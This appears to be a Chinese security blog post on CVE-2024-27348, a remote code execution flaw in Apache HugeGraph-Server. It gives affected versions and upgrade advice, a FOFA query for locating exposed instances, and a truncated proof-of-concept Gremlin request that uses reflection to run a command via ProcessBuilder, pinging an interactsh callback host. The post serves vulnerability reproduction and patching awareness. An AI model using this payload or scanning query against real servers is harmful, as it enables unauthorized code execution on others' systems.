Apache-HugeGraph-Server远程代码执行漏洞(CVE-2024-27348)

最新推荐文章于 2025-06-04 19:51:30 发布
原创 最新推荐文章于 2025-06-04 19:51:30 发布 · 339 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#apache #web安全 #安全威胁分析 #漏洞复现 #漏洞库

Apache HugeGraph-Server 中的 RCE-远程命令执行漏洞。此问题影响 Apache HugeGraph-Server:Java8 和 Java11 中 1.3.0 之前的 1.0.0 建议用户升级到 Java11 版本 1.3.0 并启用身份验证系统,这解决了这个问题。

fofa

app="HugeGraph-Studio"

poc

POST /gremlin HTTP/1.1
Host: {
  
  {Hostname}}
Content-Type: application/json

{"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{
  
  {interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(proces
最低0.47元/天 解锁文章
漏洞复现CVE-2024-36401 Geoserver远程代码执行漏洞复现
渗透之路,攻防之间皆学问
10-24 4998
GeoServer存在远程代码执行漏洞CVE-2024-36401),未经身份认证的远程攻击者可以通过该漏洞在服务器上执行任意代码,从而获取服务器权限。
Apache OFBiz 未授权远程代码执行漏洞CVE-2024-45195)
iSee857的博客
09-08 1401
Apache OFBiz是⼀个著名的电⼦商务平台,提供了创建基于最新 J2EE/ XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应⽤服务器的多层、分布式电⼦商务类WEB应⽤系统的框架。Apache OFBiz 18.12.16 之前版本中,由于Web 应用程序中缺少视图授权检查,未经身份验证的远程威胁者可构造恶意请求写入恶意文件导致远程代码执行,从而获取服务器权限。在服务器上启动一个python http服务用以 请求发送。服务器上启的http服务收到访问链接。访问下列接口进行RCE验证。
CVE-2024-27348
ubaichu的博客
05-28 545
Apache HugeGraph 远程代码执行漏洞CVE-2024-27348
CISA 提醒注意已遭利用的 Apache HugeGraph-Server 漏洞
smellycat000的专栏
09-23 715
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士美国网络安全和基础设施局 (CISA) 将五个缺陷纳入必修清单,其中一个是影响 Apache HugeGraph-Server远程代码执行 (RCE) 漏洞CVE-2024-27348。该漏洞是严重等级(CVSS v3.1 评分9.8)的访问控制不当漏洞,影响 HugeGraph-Server 1.0.0至1.3.0(不包括)版本。Apach...
Hugegraph环境配置及查询接口
zheng_wei_的博客
01-22 2573
hugegraph图数据库的环境配置和部分配置文件的详解,以及基于springboot的的查询接口
hugegraph-serverHugeGraph-Hubble超详细安装部署教程(主要idea和linux压缩文件安装)
技术分享,共同成长
11-25 4310
hugegraph-serverHugeGraph-Hubble超详细安装部署教程(主要idea和linux压缩文件安装),hugegraph-server的详细安装配置,heHugeGraph-Hubble的安装配置
HugeGraph安装与使用
qq_41060647的博客
11-21 2457
components核心,服务端,图数据到后端的存储。支持的后端包括:Memory,Cassandra,ScyllaDB, RocksDB,HBase,MySQL和PostgreSQLWeb可视化管理平台,一站式可视化分析平台。平台覆盖从数据建模,到数据快速导入,再到数据线上线下分析、图统一管理的全流程;客户端,用于连接到 HugeGraph-Server。目前,仅实现Java版本。其他语言的用户可以自己实现;数据导入工具,它将普通文本数据转换为图形顶点和边缘,并插入图形数据库;
Rochy Linux 9.0 OpenSSH 远程代码执行漏洞(CVE-2024-6387)修复方案
07-04
Rochy Linux 9.0 OpenSSH 远程代码执行漏洞(CVE-2024-6387)修复方案
CVE-2024-6387 OpenSSH Server 远程代码执行漏洞
联蔚盘云的博客
07-03 1358
这体现了在复杂软件维护和版本迭代中,对历史安全补丁的持续关注和代码审查的重要性。函数中的#ifdef DO_LOG_SAFE_IN_SIGHAND预处理指令,导致了信号处理器竞态条件的漏洞再次出现。服务器端的信号处理器竞态条件漏洞,它在特定版本间存在或消失,与代码变更紧密相关。版本前存在的信号处理器竞态条件,可能允许远程攻击者造成拒绝服务(崩溃),甚至执行任意代码。函数,使得它在信号处理器中成为安全的调用,所以这个时期版本的。(后者的修复不正确),则存在信号处理器竞态条件的漏洞。的一个回归,该漏洞最早在。
ApacheSuperset CVE-2023-27524
最新发布
m0_73135216的博客
06-04 577
CVE-2023-27524 是一种远程代码执行漏洞,攻击者通过该漏洞可在受影响系统上执行任意代码,从而获得未授权访问权。任务二 python 问题解决。任务一 代理 | 拉取镜像。任务四 替换cookie。任务三 生成cookie。
数据库技术栈 —— 图数据库HugeGraph入门
键盘国治理专家的博客
02-09 859
开篇不说废话,实际上手后,我认为百度开源并后续放弃维护转由社区维护的HugeGraph改进空间十分巨大,话里意思自己体会,原因可以看这个视频,图不是伪需求,但为此硬要搞一些丑陋的实现就绝对是造方轮子,把知识图谱等同于图数据库绝对是错上加错。
Apache Http Server安全漏洞解决
热门推荐
DaiSnow的博客
04-21 1万+
场景:公司使用的大数据集群云服务器,安全扫描出严重漏洞,扫描漏洞如下: 安全漏洞扫描报告 端口 协议 服务 严重等级 漏洞 – ICMP – 弱 ICMP timestamp请求响应漏洞 – UDP – 弱 允许Traceroute探测 80 TCP http 严重 严重 严重 严重 严重 弱 OpenSSL 安全漏洞(CVE-2022-0778) Apache HTTP Server 环境问题漏洞(CVE-2022-22720) Apache HTTP Server 输入验证错误
Apache HTTP Server 路径穿越漏洞
qq_53008544的博客
05-01 1815
发现对 Apache HTTP 服务器 2.4.50 中的 CVE-2021-41773 的修复不足。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可以成功。如果还为这些别名路径启用了 CGI 脚本,则可能允许远程执行代码。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不会影响早期版本。
Apache HTTP Server漏洞CVE-2021-41773)
weixin_44769042的博客
10-26 6387
漏洞复现记录--1 搭建环境 容器可以直接从DockerHub使用 dockerpullblueteamsteve/cve-2021-41773:no-cgid 使用: dockerrun-dit-p8080:80blueteamsteve/cve-2021-41773:no-cgid 访问:ip:8080
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
qq_59975439的博客
06-10 7594
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
Apache HTTP Server路径穿越漏洞 (CVE-2021-41773)
kukudeshuo的博客
01-19 7839
Apache HTTP Server路径穿越漏洞 (CVE-2021-41773) 漏洞描述 攻击者可以使用路径遍历攻击将URL映射到预期文档根以外的文件。如果文档根目录以外的文件不受require all denied保护,则攻击者可以访问这些文件。 CVE编号 CVE-2021-41773 漏洞影响范围 仅影响Apache HTTP Server 2.4.49版本 漏洞评级 高危 漏洞复现 环境搭建 这里用github的项目进行漏洞复现 项目下载地址:https://github.com/blasty/
Apache HTTP Server 中发现严重安全漏洞
darkng2015的博客
03-09 1950
IT安全公司 Sense of Security在Apache的HTTP web server中发 现了一 个严重的漏洞,该漏洞允许远程攻击者获得一个数据库的完整控制权。该漏洞存在于Apache核心的mod_isapi模块中 利用该漏洞,一位攻 击者能远程提升系统权限,从而威胁到数据安全Apache 2.2.14及早期版本的用户应该尽快升级到 Apache 2.2.15。不过,...
Apache HTTP Server上严重漏洞 编号为CVE-2019-0211
SBFPLAY直播记录馆
04-08 3391
Apache软件基金会(Apache Software Foundation)近日修补了Apache HTTP Server上的一个严重漏洞,此一编号为CVE-2019-0211的安全漏洞属于本地端权限扩张漏洞,将允许黑客取得系统的最高权限以执行任意程序,从2015年10月发表的2.4.17到今年2月发表的2.4.38的十多个版本都遭殃,用户应尽快升级到4月1日释出的2.4.39。此一漏洞可在Ap...
Apache HTTP Server路径穿越漏洞复现(CVE-2021-41773)
小小猪的博客
10-26 3951
sudo docker pull blueteamsteve/cve-2021-41773:no-cgid sudo docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值